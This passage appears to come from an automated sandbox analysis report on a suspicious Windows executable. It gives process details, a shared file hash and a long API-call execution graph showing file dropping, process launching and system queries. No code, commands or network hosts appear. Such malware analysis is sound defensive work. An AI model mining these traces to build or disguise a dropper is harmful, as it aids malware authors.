                                                                  Has exited:true

                                                                  General

                                                                  Target ID:45
                                                                  Start time:06:48:30
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\blockcomSession\mQBLhXIPAJ.exe"
                                                                  Imagebase:0xcb0000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:46
                                                                  Start time:06:48:35
                                                                  Start date:13/01/2025
                                                                  Path:C:\blockcomSession\containerReview.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\blockcomSession\containerReview.exe"
                                                                  Imagebase:0xf00000
                                                                  File size:2'006'016 bytes
                                                                  MD5 hash:F568E43BC473CD8CEB2553C58194DF61
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:6.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:23.1%
                                                                    Total number of Nodes:769
                                                                    Total number of Limit Nodes:42
                                                                    execution_graph 40200 fc8598 40201 fc85a5 VirtualAlloc 40200->40201 40203 de9f7a 40205 de9f8f 40203->40205 40206 de9f88 40203->40206 40204 dea003 WriteFile 40204->40205 40205->40204 40205->40206 40207 dfcd58 40210 dfcd7b _wcschr 40207->40210 40209 dfd40a 40215 dfc793 _swprintf _abort _wcslen _wcsrchr 40210->40215 40216 dfd78f 40210->40216 40211 dfca67 SetWindowTextW 40211->40215 40213 dfcc31 GetDlgItem SetWindowTextW SendMessageW 40213->40215 40214 dfcc71 SendMessageW 40214->40215 40215->40209 40215->40211 40215->40213 40215->40214 40228 dea5d1 FindFirstFileW FindFirstFileW 40215->40228 40221 dfd799 _abort _wcslen 40216->40221 40217 dfd9e7 40217->40215 40219 dfd8ba 40222 dfd8d9 ShellExecuteExW 40219->40222 40220 dfd9de ShowWindow 40220->40217 40221->40217 40224 dfd93d 40221->40224 40229 dea231 40221->40229 40222->40217 40225 dfd8ec 40222->40225 40223 dfd925 40232 dfdc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 40223->40232 40224->40217 40224->40220 40225->40223 40225->40224 40226 dfd91b ShowWindow 40225->40226 40226->40223 40228->40215 40233 dea243 40229->40233 40232->40224 40239 dfec50 40233->40239 40236 dea23a 40236->40219 40237 dea261 40237->40236 40238 dea279 GetFileAttributesW 40237->40238 40238->40236 40240 dea250 GetFileAttributesW 40239->40240 40240->40236 40240->40237 40241 e0ba89 40242 e0ba91 40241->40242 40243 e0baae 40241->40243 40249 e08dcc 40242->40249 40245 e08dcc _free RtlFreeHeap 40243->40245 40248 e0bada 40243->40248 40245->40248 40247 e0baa4 40248->40242 40252 e0b691 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 40248->40252 40250 e08dd7 RtlFreeHeap 40249->40250 40251 e08dec _free 40249->40251 40250->40251 40251->40247 40252->40242 40253 de9a74 40255 de9a7e 40253->40255 40254 de9b9d SetFilePointer 40258 de9ab1 40254->40258 40255->40254 40257 de9b79 40255->40257 40255->40258 40259 de981a 40255->40259 40257->40254 40260 de9833 40259->40260 40263 de9e80 40260->40263 40261 de9865 40261->40257 40264 de9e92 40263->40264 40265 de9eb8 SetFilePointer 40264->40265 40266 de9eb0 40264->40266 40265->40266 40266->40261 40267 e0bd4d 40268 e0bd54 40267->40268 40268->40267 40271 dffbbc 40268->40271 40270 e0bddd 40272 dffbc4 40271->40272 40273 dffbc5 40271->40273 40272->40270 40276 dffbca UnhandledExceptionFilter 40273->40276 40275 dffcea 40275->40270 40276->40275 40277 de10d0 40282 de5abd 40277->40282 40283 de5ac7 __EH_prolog 40282->40283 40289 deb505 40283->40289 40285 de5ad3 40293 de5cac NtQueryInformationProcess GetSystemInfo 40285->40293 40290 deb50f __EH_prolog 40289->40290 40294 deb61e 40290->40294 40295 deb630 _abort 40294->40295 40298 df10dc 40295->40298 40301 df109e 40298->40301 40302 df10b1 40301->40302 40305 5256861 NtQueryInformationProcess GetSystemInfo 40302->40305 40303 deb597 40303->40285 40305->40303 40306 e098f0 40311 e0adaf 40306->40311 40308 e098fa 40309 e09904 40308->40309 40315 e09920 UnhandledExceptionFilter 40308->40315 40312 e0add6 _abort 40311->40312 40313 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40312->40313 40314 e0adff 40313->40314 40314->40308 40315->40309 40316 e0abf0 40317 e0abfb 40316->40317 40319 e0ac20 40317->40319 40320 e0af0a 40317->40320 40321 e0af31 _abort 40320->40321 40322 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40321->40322 40323 e0af66 40322->40323 40323->40317 40324 e09893 40336 e0b136 40324->40336 40326 e0989a 40327 e098a2 40326->40327 40340 e0aeb1 UnhandledExceptionFilter _abort _ValidateLocalCookies 40326->40340 40329 e08dcc _free RtlFreeHeap 40327->40329 40335 e098a8 40329->40335 40330 e098b7 40330->40327 40331 e098be 40330->40331 40341 e09649 RtlFreeHeap 40331->40341 40333 e098c9 40334 e08dcc _free RtlFreeHeap 40333->40334 40334->40335 40338 e0b143 40336->40338 40337 e0b181 40337->40326 40338->40337 40342 e07a5e UnhandledExceptionFilter _ValidateLocalCookies 40338->40342 40340->40330 40341->40333 40342->40338 40343 e0bfb3 40344 e0bfbe 40343->40344 40346 e0bff5 40344->40346 40348 e0bfd7 _abort 40344->40348 40358 e0f20f UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40344->40358 40349 e08e54 40346->40349 40350 e08e61 40349->40350 40351 e08e6c 40349->40351 40359 e08e06 40350->40359 40353 e08e74 40351->40353 40356 e08e7d 40351->40356 40355 e08dcc _free RtlFreeHeap 40353->40355 40354 e08e69 40354->40348 40355->40354 40356->40354 40363 e07a5e UnhandledExceptionFilter _ValidateLocalCookies 40356->40363 40358->40346 40360 e08e42 40359->40360 40361 e08e14 40359->40361 40360->40354 40361->40360 40364 e07a5e UnhandledExceptionFilter _ValidateLocalCookies 40361->40364 40363->40356 40364->40361 40365 df0888 40367 df0894 40365->40367 40366 df0c94 GetFileAttributesW 40366->40367 40367->40366 40368 df0cac _swprintf 40367->40368 40369 dff4e7 40370 dff4ef 40369->40370 40371 dff4f3 40370->40371 40374 dff3b2 ___scrt_is_nonwritable_in_current_image ___security_init_cookie ___scrt_release_startup_lock 40370->40374 40377 dff40e 40371->40377 40432 e07eec UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess _abort 40371->40432 40374->40377 40381 dff4b5 40374->40381 40386 dfeed7 40374->40386 40390 e08aed 40374->40390 40394 e08a91 40374->40394 40398 dfdf1e 40374->40398 40423 e07f58 40374->40423 40426 e07f0a 40374->40426 40429 e07af4 5 API calls _abort 40374->40429 40383 dff4be 40381->40383 40430 e07efb UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess _abort 40381->40430 40431 dff048 UnhandledExceptionFilter ___scrt_uninitialize_crt 40383->40431 40387 dfeee0 40386->40387 40389 dfeef5 ___scrt_uninitialize_crt 40387->40389 40433 e08977 40387->40433 40389->40374 40393 e08b04 40390->40393 40391 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40392 e08b2e 40391->40392 40392->40374 40393->40391 40395 e08ac0 40394->40395 40396 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40395->40396 40397 e08ae9 40396->40397 40397->40374 40399 dfdf2e 40398->40399 40440 dfac16 40399->40440 40401 dfdf46 _abort 40403 dfdf6e _swprintf __InternalCxxFrameHandler 40401->40403 40473 dfc5c4 CharUpperW 40401->40473 40404 dfe067 LoadIconW 40403->40404 40445 dfb6dd LoadBitmapW 40404->40445 40408 dfe098 40467 df90b7 40408->40467 40411 df90b7 UnhandledExceptionFilter 40412 dfe0aa DialogBoxParamW 40411->40412 40413 dfe0e4 40412->40413 40415 dfe10b 40413->40415 40474 dfae2f SetCurrentDirectoryW _abort _wcslen 40413->40474 40416 dfe12a DeleteObject 40415->40416 40417 dfe13f DeleteObject 40416->40417 40418 dfe146 40416->40418 40417->40418 40419 dfe17d 40418->40419 40475 dfdc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 40418->40475 40470 dfac7c 40419->40470 40422 dfe1c3 40422->40374 40580 e07cd5 40423->40580 40427 e07cd5 _abort 4 API calls 40426->40427 40428 e07f1b 40427->40428 40428->40374 40429->40374 40430->40383 40431->40377 40432->40377 40436 e0c05a 40433->40436 40437 e0c073 40436->40437 40438 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40437->40438 40439 e08986 40438->40439 40439->40389 40476 df081b 40440->40476 40442 dfac2a OleInitialize 40443 dfac4d 40442->40443 40444 dfac6b SHGetMalloc 40443->40444 40444->40401 40446 dfb6fe 40445->40446 40447 dfb70b GetObjectW 40445->40447 40483 dfa6c2 40446->40483 40449 dfb71a 40447->40449 40478 dfa5c6 40449->40478 40450 dfb705 40450->40447 40450->40449 40453 dfb770 40464 deda42 40453->40464 40454 dfb74c 40489 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40454->40489 40456 dfa6c2 2 API calls 40458 dfb73d 40456->40458 40457 dfb754 40490 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40457->40490 40458->40454 40460 dfb743 DeleteObject 40458->40460 40460->40454 40461 dfb75d 40491 dfa80c 8 API calls 40461->40491 40463 dfb764 DeleteObject 40463->40453 40496 deda67 40464->40496 40466 deda4e 40466->40408 40575 dfeb38 40467->40575 40469 df90d6 40469->40411 40471 dfacab 40470->40471 40472 dfacb5 CoUninitialize 40471->40472 40472->40422 40473->40403 40474->40415 40475->40419 40477 df0828 40476->40477 40477->40442 40492 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40478->40492 40480 dfa5cd 40481 dfa5d9 40480->40481 40493 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40480->40493 40481->40453 40481->40454 40481->40456 40484 dfa6db __InternalCxxFrameHandler 40483->40484 40485 dfa754 CreateStreamOnHGlobal 40484->40485 40488 dfa776 40484->40488 40486 dfa76c 40485->40486 40485->40488 40494 dfa626 73516BB0 40486->40494 40488->40450 40489->40457 40490->40461 40491->40463 40492->40480 40493->40481 40495 dfa638 40494->40495 40495->40488 40497 deda75 _wcschr __EH_prolog 40496->40497 40526 de98e0 40497->40526 40500 dedb05 40513 dedd4a 40500->40513 40530 e06310 40500->40530 40503 dedb44 40504 e06310 2 API calls 40503->40504 40512 dedb56 ___vcrt_FlsGetValue 40504->40512 40505 dedc85 40505->40513 40554 de9d70 SetFilePointer SetFilePointer 40505->40554 40507 de9e80 SetFilePointer 40507->40512 40509 dedc9f ___std_exception_copy 40510 de9bd0 2 API calls 40509->40510 40509->40513 40524 dedcc8 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 40510->40524 40512->40505 40512->40507 40512->40513 40549 de9bd0 40512->40549 40553 de9d70 SetFilePointer SetFilePointer 40512->40553 40542 de959a 40513->40542 40514 dee159 40520 dee1c6 40514->40520 40558 e08cce UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40514->40558 40517 dee16e 40559 e07625 UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40517->40559 40519 e06310 2 API calls 40521 dee22d 40519->40521 40520->40519 40522 e06310 2 API calls 40521->40522 40522->40513 40524->40513 40524->40514 40555 dee5b1 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter __vsnprintf 40524->40555 40556 e08cce UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40524->40556 40557 e07625 UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40524->40557 40528 de98ea 40526->40528 40527 de994b CreateFileW 40529 de996c 40527->40529 40528->40527 40529->40500 40531 e06349 40530->40531 40532 e0634d 40531->40532 40538 e06375 40531->40538 40560 e09087 UnhandledExceptionFilter UnhandledExceptionFilter ___std_exception_copy 40532->40560 40533 e06699 40534 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40533->40534 40536 e066a6 40534->40536 40536->40503 40537 e0635d 40539 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40537->40539 40538->40533 40561 e06230 UnhandledExceptionFilter _ValidateLocalCookies 40538->40561 40541 e06369 40539->40541 40541->40503 40543 de95be 40542->40543 40544 de95cf 40542->40544 40543->40544 40545 de95ca 40543->40545 40546 de95d1 40543->40546 40544->40466 40562 de974e 40545->40562 40567 de9620 40546->40567 40551 de9bdc 40549->40551 40552 de9be3 40549->40552 40550 de9785 ReadFile GetFileType 40550->40552 40551->40512 40552->40550 40552->40551 40553->40512 40554->40509 40555->40524 40556->40524 40557->40524 40558->40517 40559->40520 40560->40537 40561->40538 40563 de9757 40562->40563 40564 de9781 40562->40564 40563->40564 40571 dea1e0 40563->40571 40564->40544 40566 de977f 40566->40544 40568 de962c 40567->40568 40569 de964a 40567->40569 40568->40569 40570 de9638 CloseHandle 40568->40570 40569->40544 40570->40569 40572 dfec50 40571->40572 40573 dea1ed DeleteFileW 40572->40573 40574 dea200 40573->40574 40574->40566 40576 dfeb3d ___std_exception_copy 40575->40576 40578 dfeb57 _com_raise_error 40576->40578 40579 e07a5e UnhandledExceptionFilter _ValidateLocalCookies 40576->40579 40578->40469 40579->40576 40581 e07ce1 _abort 40580->40581 40584 e07cf9 _abort 40581->40584 40605 e07e73 40581->40605 40583 e07d76 40587 e07d8e 40583->40587 40591 e08a91 _abort UnhandledExceptionFilter 40583->40591 40584->40583 40595 e07d9f _abort 40584->40595 40609 e087e0 UnhandledExceptionFilter RtlFreeHeap _abort 40584->40609 40585 e07de8 40610 e12390 UnhandledExceptionFilter _ValidateLocalCookies 40585->40610 40586 e07dbc 40596 e07dee 40586->40596 40592 e08a91 _abort UnhandledExceptionFilter 40587->40592 40591->40587 40592->40595 40595->40585 40595->40586 40611 e0b076 40596->40611 40599 e07e0c 40601 e07e73 _abort UnhandledExceptionFilter 40599->40601 40600 e07dfc GetPEB 40600->40599 40602 e07e24 40601->40602 40615 52566f9 RtlExitUserProcess 40602->40615 40606 e07e99 40605->40606 40607 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40606->40607 40608 e07ed9 40607->40608 40608->40584 40609->40583 40614 e0b091 _abort 40611->40614 40612 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40613 e07df8 40612->40613 40613->40599 40613->40600 40614->40612 40616 e07e2e 40615->40616 40617 e0b8fd 40618 e0b90a 40617->40618 40625 e0ab78 40618->40625 40621 e0ab78 2 API calls 40622 e0b977 40621->40622 40623 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40622->40623 40624 e0ba23 40623->40624 40626 e0ab8b 40625->40626 40629 e0a95b 40626->40629 40630 e0a976 40629->40630 40631 e0ab50 40630->40631 40634 e08e06 UnhandledExceptionFilter 40630->40634 40636 e0a9e7 40630->40636 40632 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40631->40632 40633 e0ab63 40632->40633 40633->40621 40634->40636 40635 e0aa9c 40658 e0abc3 RtlFreeHeap _free 40635->40658 40636->40635 40651 e0af6c 40636->40651 40640 e0aa73 40640->40635 40642 e0af6c UnhandledExceptionFilter 40640->40642 40641 e0aaab 40644 e08e06 UnhandledExceptionFilter 40641->40644 40647 e0aacc 40641->40647 40642->40635 40643 e0ab41 40657 e0abc3 RtlFreeHeap _free 40643->40657 40644->40647 40645 e0af6c UnhandledExceptionFilter 40648 e0ab20 40645->40648 40647->40643 40647->40645 40648->40643 40649 e0ab6f 40648->40649 40659 e0abc3 RtlFreeHeap _free 40649->40659 40652 e0af93 _abort 40651->40652 40654 e0af9c 40652->40654 40660 e0aff4 UnhandledExceptionFilter _abort _ValidateLocalCookies 40652->40660 40655 dffbbc _ValidateLocalCookies UnhandledExceptionFilter 40654->40655 40656 e0aa60 40655->40656 40656->40635 40656->40640 40656->40641 40657->40635 40658->40631 40659->40635 40660->40654 40661 dfdec2 40662 dfdecf _swprintf 40661->40662 40663 dfdef1 SetDlgItemTextW 40662->40663 40666 dfb568 PeekMessageW 40663->40666 40667 dfb5bc 40666->40667 40668 dfb583 GetMessageW 40666->40668 40669 dfb599 IsDialogMessageW 40668->40669 40670 dfb5a8 TranslateMessage DispatchMessageW 40668->40670 40669->40667 40669->40670 40670->40667 40671 dfb7e0 40672 dfb7ea __EH_prolog 40671->40672 40787 de1316 40672->40787 40675 dfbf0f 40824 dfd69e 40675->40824 40676 dfb82a 40679 dfb89b 40676->40679 40680 dfb838 40676->40680 40732 dfb841 _swprintf _wcslen 40676->40732 40683 dfb92e GetDlgItemTextW 40679->40683 40687 dfb8b1 40679->40687 40691 dfb83c 40680->40691 40743 dfb878 40680->40743 40681 dfbf2a SendMessageW 40682 dfbf38 40681->40682 40685 dfbf52 GetDlgItem SendMessageW 40682->40685 40686 dfbf41 SendDlgItemMessageW 40682->40686 40684 dfb96b 40683->40684 40683->40743 40690 dfb980 GetDlgItem 40684->40690 40784 dfb974 40684->40784 40841 dfa64d 40685->40841 40686->40685 40695 dfb8ce SetDlgItemTextW 40687->40695 40689 dfb95f EndDialog 40689->40732 40693 dfb9b7 SetFocus 40690->40693 40694 dfb994 SendMessageW SendMessageW 40690->40694 40691->40732 40860 de124f SHGetMalloc 40691->40860 40699 dfb9c7 40693->40699 40714 dfb9e0 _swprintf 40693->40714 40694->40693 40700 dfb8d9 40695->40700 40697 dfbf9f 40698 dfbfa5 SetWindowTextW 40697->40698 40843 dfabab GetClassNameW 40698->40843 40861 dfd4d4 40699->40861 40704 dfb8e6 GetMessageW 40700->40704 40700->40732 40701 dfb862 40709 dfc1fc SetDlgItemTextW 40701->40709 40701->40732 40702 dfbe55 40710 dfbe65 SetDlgItemTextW 40702->40710 40707 dfb8fd IsDialogMessageW 40704->40707 40704->40732 40707->40700 40712 dfb90c TranslateMessage DispatchMessageW 40707->40712 40709->40732 40710->40732 40712->40700 40713 dfbff0 40718 dfc020 40713->40718 40722 dfc003 SetDlgItemTextW 40713->40722 40723 dfd4d4 16 API calls 40714->40723 40715 dfb9d9 40797 dea0b1 40715->40797 40717 dfc73f 7 API calls 40717->40713 40720 dfc0d8 40718->40720 40724 dfc73f 7 API calls 40718->40724 40721 dfc18b 40720->40721 40744 dfc169 40720->40744 40725 dfc19d 40721->40725 40726 dfc194 EnableWindow 40721->40726 40728 dee617 40722->40728 40723->40715 40729 dfc03b 40724->40729 40730 dfc1ba 40725->40730 40877 de12d3 GetDlgItem EnableWindow 40725->40877 40726->40725 40731 dfc017 SetDlgItemTextW 40728->40731 40733 dfc04d 40729->40733 40746 dfc072 40729->40746 40730->40701 40741 dfc1d9 SendMessageW 40730->40741 40731->40718 40875 df9ed5 7 API calls 40733->40875 40734 dfc0cb 40736 dfc73f 7 API calls 40734->40736 40736->40720 40738 dfc1b0 40878 de12d3 GetDlgItem EnableWindow 40738->40878 40739 dfbd56 40808 de12f1 GetDlgItem ShowWindow 40739->40808 40741->40701 40743->40689 40743->40732 40876 df9ed5 7 API calls 40744->40876 40745 dfc066 40745->40746 40746->40734 40751 dfc73f 7 API calls 40746->40751 40747 dfbd66 40809 de12f1 GetDlgItem ShowWindow 40747->40809 40750 dfc188 40750->40721 40753 dfc0a0 40751->40753 40752 dfbd70 40756 dfbd7a SetDlgItemTextW 40752->40756 40753->40734 40755 dfc0a9 DialogBoxParamW 40753->40755 40754 dfba87 _swprintf 40763 dfbb20 _swprintf 40754->40763 40766 dfbb11 40754->40766 40804 de966e 40754->40804 40755->40734 40755->40743 40810 de12f1 GetDlgItem ShowWindow 40756->40810 40759 dfbd8c SetDlgItemTextW GetDlgItem 40761 dfbda9 GetWindowLongW SetWindowLongW 40759->40761 40762 dfbdc1 40759->40762 40760 dfbaed 40764 de959a 2 API calls 40760->40764 40761->40762 40811 dfc73f 40762->40811 40763->40732 40763->40743 40771 dfbbf4 40763->40771 40786 dfbc28 __InternalCxxFrameHandler 40763->40786 40764->40766 40766->40739 40766->40763 40767 dfbc6b ShellExecuteExW 40782 dfbc88 40767->40782 40769 dfc73f 7 API calls 40770 dfbddd 40769->40770 40818 dfda52 40770->40818 40871 dfb425 SHGetMalloc 40771->40871 40774 dfbdee 40776 dfc73f 7 API calls 40774->40776 40775 dfbc10 40872 dfb425 SHGetMalloc 40775->40872 40783 dfbe03 40776->40783 40778 dfbc1c 40873 dfb425 SHGetMalloc 40778->40873 40779 dfbe2c 40874 de12d3 GetDlgItem EnableWindow 40779->40874 40782->40743 40783->40779 40785 dfc73f 7 API calls 40783->40785 40784->40702 40784->40743 40785->40779 40786->40767 40788 de131f 40787->40788 40789 de1378 40787->40789 40791 de1385 40788->40791 40879 dee2e8 10 API calls 2 library calls 40788->40879 40880 dee2c1 GetWindowLongW SetWindowLongW 40789->40880 40791->40675 40791->40676 40791->40732 40793 de1341 40793->40791 40794 de1354 GetDlgItem 40793->40794 40794->40791 40795 de1364 40794->40795 40795->40791 40796 de136a SetWindowTextW 40795->40796 40796->40791 40800 dea0bb 40797->40800 40798 dea14c 40799 dea2b2 4 API calls 40798->40799 40802 dea175 40798->40802 40799->40802 40800->40798 40800->40802 40881 dea2b2 40800->40881 40803 dfac04 SetCurrentDirectoryW 40802->40803 40803->40754 40805 de9678 40804->40805 40806 de96d5 CreateFileW 40805->40806 40807 de96c9 40805->40807 40806->40807 40807->40760 40808->40747 40809->40752 40810->40759 40817 dfc749 _swprintf _abort _wcslen __EH_prolog _wcsrchr 40811->40817 40812 dfbdcf 40812->40769 40813 dfca67 SetWindowTextW 40813->40817 40815 dfcc31 GetDlgItem SetWindowTextW SendMessageW 40815->40817 40816 dfcc71 SendMessageW 40816->40817 40817->40812 40817->40813 40817->40815 40817->40816 40893 dea5d1 FindFirstFileW FindFirstFileW 40817->40893 40819 dfda5c __EH_prolog 40818->40819 40894 de7b0d 40819->40894 40823 dfdafe 40823->40774 40825 dfd6a8 40824->40825 40826 dfa5c6 4 API calls 40825->40826 40827 dfd6ad 40826->40827 40828 dfd6b5 GetWindow 40827->40828 40829 dfbf15 40827->40829 40828->40829 40831 dfd6d5 40828->40831 40829->40681 40829->40682 40830 dfd6e2 GetClassNameW 40830->40831 40831->40829 40831->40830 40832 dfd76a GetWindow 40831->40832 40833 dfd706 GetWindowLongW 40831->40833 40832->40829 40832->40831 40833->40832 40834 dfd716 SendMessageW 40833->40834 40834->40832 40835 dfd72c GetObjectW 40834->40835 41180 dfa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40835->41180 40837 dfd743 41181 dfa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 40837->41181 41182 dfa80c 8 API calls 40837->41182 40840 dfd754 SendMessageW DeleteObject 40840->40832 40842 dfa65b GetDlgItem 40841->40842 40842->40697 40842->40698 40844 dfabcc 40843->40844 40845 dfabf1 40843->40845 40844->40845 40846 dfabe3 FindWindowExW 40844->40846 40847 dfb093 40845->40847 40846->40845 40848 dfb09d __EH_prolog 40847->40848 40849 de13dc 3 API calls 40848->40849 40850 dfb0bf 40849->40850 41183 de1fdc 40850->41183 40852 dfb0d1 40853 dfb0eb 40852->40853 40854 dfb0d9 40852->40854 40856 de19af 21 API calls 40853->40856 40855 de1692 2 API calls 40854->40855 40857 dfb0e4 40855->40857 40859 dfb10d __InternalCxxFrameHandler ___std_exception_copy 40856->40859 40857->40713 40857->40717 40858 de1692 2 API calls 40858->40857 40859->40858 40860->40701 40862 dfb568 5 API calls 40861->40862 40863 dfd4e0 GetDlgItem 40862->40863 40864 dfd536 SendMessageW SendMessageW 40863->40864 40865 dfd502 40863->40865 40866 dfd572 40864->40866 40867 dfd591 SendMessageW SendMessageW SendMessageW 40864->40867 40870 dfd50d ShowWindow SendMessageW SendMessageW 40865->40870 40866->40867 40868 dfd5e7 SendMessageW 40867->40868 40869 dfd5c4 SendMessageW 40867->40869 40868->40715 40869->40868 40870->40864 40871->40775 40872->40778 40873->40786 40874->40784 40875->40745 40876->40750 40877->40738 40878->40730 40879->40793 40880->40791 40882 dea2bf 40881->40882 40883 dea2e3 40882->40883 40884 dea2d6 CreateDirectoryW 40882->40884 40885 dea231 2 API calls 40883->40885 40884->40883 40886 dea2e9 40884->40886 40885->40886 40887 dea325 40886->40887 40889 dea4ed 40886->40889 40887->40800 40890 dfec50 40889->40890 40891 dea4fa SetFileAttributesW 40890->40891 40892 dea510 40891->40892 40892->40887 40893->40817 40895 de7b17 __EH_prolog 40894->40895 40908 dece40 40895->40908 40897 de7b32 40898 dfeb38 UnhandledExceptionFilter 40897->40898 40899 de7b5c 40898->40899 40914 df4a76 40899->40914 40901 de7b8b 40902 de7c7d 40901->40902 40903 de7c87 40902->40903 40906 de7cf1 40903->40906 40937 dea56d 40903->40937 40905 de7d50 40905->40823 40906->40905 40918 de8284 40906->40918 40909 dece4a __EH_prolog 40908->40909 40910 dfeb38 UnhandledExceptionFilter 40909->40910 40912 dece8d 40910->40912 40911 dfeb38 UnhandledExceptionFilter 40913 deceb1 40911->40913 40912->40911 40913->40897 40915 df4a80 __EH_prolog 40914->40915 40916 dfeb38 UnhandledExceptionFilter 40915->40916 40917 df4a9c 40916->40917 40917->40901 40919 de828e __EH_prolog 40918->40919 40943 de13dc 40919->40943 40921 de82aa 40923 de82f2 40921->40923 40951 de1a04 40921->40951 41052 de1692 40923->41052 40926 de8389 40963 de8430 40926->40963 40928 de83a3 40929 de83e8 40928->40929 40966 df1b66 40928->40966 40969 de1f6d 40929->40969 40930 de82ee 40930->40923 40930->40926 40935 dea56d 3 API calls 40930->40935 40933 de83f3 40933->40923 40973 de3b2d 40933->40973 40983 de848e 40933->40983 40935->40930 40938 dea582 40937->40938 40939 dea5b0 40938->40939 41174 dea69b 40938->41174 40939->40903 40941 dea592 40941->40939 40942 dea597 FindClose 40941->40942 40942->40939 40944 de13e6 __EH_prolog 40943->40944 40945 dece40 UnhandledExceptionFilter 40944->40945 40946 de1419 40945->40946 40947 dfeb38 UnhandledExceptionFilter 40946->40947 40950 de1474 _abort 40946->40950 40948 de1461 40947->40948 40949 deb505 2 API calls 40948->40949 40948->40950 40949->40950 40950->40921 40952 de1a0e __EH_prolog 40951->40952 40957 de1a61 40952->40957 40960 de1b9b 40952->40960 40962 de9e80 SetFilePointer 40952->40962 40953 de3b2d 2 API calls 40954 de1c12 40953->40954 40955 de3b2d 2 API calls 40954->40955 40956 de1c5a 40954->40956 40955->40954 40956->40960 40961 de9e80 SetFilePointer 40956->40961 40957->40953 40957->40960 40958 de3b2d 2 API calls 40959 de1cde 40958->40959 40959->40958 40959->40960 40960->40930 40961->40959 40962->40957 41059 decf3d 40963->41059 40965 de8440 40965->40928 41063 dfde6b 40966->41063 40970 de1f77 __EH_prolog 40969->40970 40972 de1fa6 40970->40972 41067 de19af 40970->41067 40972->40933 40974 de3b3d 40973->40974 40975 de3b39 40973->40975 40982 de9e80 SetFilePointer 40974->40982 40975->40933 40976 de3b4f 40977 de3b6a 40976->40977 40978 de3b78 40976->40978 40981 de3b76 40977->40981 41128 de32f7 SetFilePointer DialogBoxParamW _swprintf __EH_prolog 40977->41128 41129 de286b SetFilePointer DialogBoxParamW __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __EH_prolog _strlen 40978->41129 40981->40933 40982->40976 40984 de8498 __EH_prolog 40983->40984 40989 de84d5 40984->40989 40994 de8513 40984->40994 41146 df8c8d 19 API calls 40984->41146 40985 de84f5 40987 de851c 40985->40987 40988 de84fa 40985->40988 40987->40994 41148 df8c8d 19 API calls 40987->41148 40988->40994 41147 de7a0d 29 API calls 40988->41147 40989->40985 40993 de857a 40989->40993 40989->40994 40993->40994 41130 de5d1a 40993->41130 40994->40933 40995 de8605 40995->40994 41136 de8167 40995->41136 40997 de8797 40998 dea56d 3 API calls 40997->40998 41002 de8802 40997->41002 40998->41002 41000 de8a5f 41003 de8ab6 41000->41003 41016 de8a6a 41000->41016 41001 de898b 41001->41000 41006 de89e1 41001->41006 41002->40994 41002->41001 41149 de8117 DialogBoxParamW 41002->41149 41009 de8a4c 41003->41009 41152 de7fc0 9 API calls 41003->41152 41004 de8b14 41020 de8b5a 41004->41020 41049 de90eb 41004->41049 41153 de98bc 41004->41153 41005 de8ab4 41010 de959a 2 API calls 41005->41010 41006->41004 41006->41009 41011 dea231 2 API calls 41006->41011 41008 de959a 2 API calls 41008->40994 41009->41004 41009->41005 41010->40994 41012 de8a19 41011->41012 41012->41009 41150 de92a3 9 API calls 41012->41150 41014 deab1a UnhandledExceptionFilter 41015 de8bd1 41014->41015 41017 deab1a UnhandledExceptionFilter 41015->41017 41016->41005 41151 de7db2 9 API calls 41016->41151 41030 de8be7 41017->41030 41020->41014 41021 de8d18 41024 de8d8a 41021->41024 41025 de8d28 41021->41025 41022 de8e40 41026 de8e66 41022->41026 41027 de8e52 41022->41027 41044 de8d37 41022->41044 41023 de8cbc 41023->41021 41023->41022 41031 de8167 2 API calls 41024->41031 41025->41044 41157 de77b8 10 API calls 41025->41157 41029 df3377 20 API calls 41026->41029 41028 de9215 21 API calls 41027->41028 41028->41044 41032 de8e7f 41029->41032 41030->41023 41033 de8c93 41030->41033 41038 de981a SetFilePointer 41030->41038 41034 de8dbd 41031->41034 41160 df3020 21 API calls 41032->41160 41033->41023 41156 de9a3c SetFilePointer SetFilePointer SetEndOfFile 41033->41156 41039 de8de6 41034->41039 41040 de8df5 41034->41040 41034->41044 41038->41033 41158 de7542 GetFileAttributesW GetFileAttributesW CreateDirectoryW 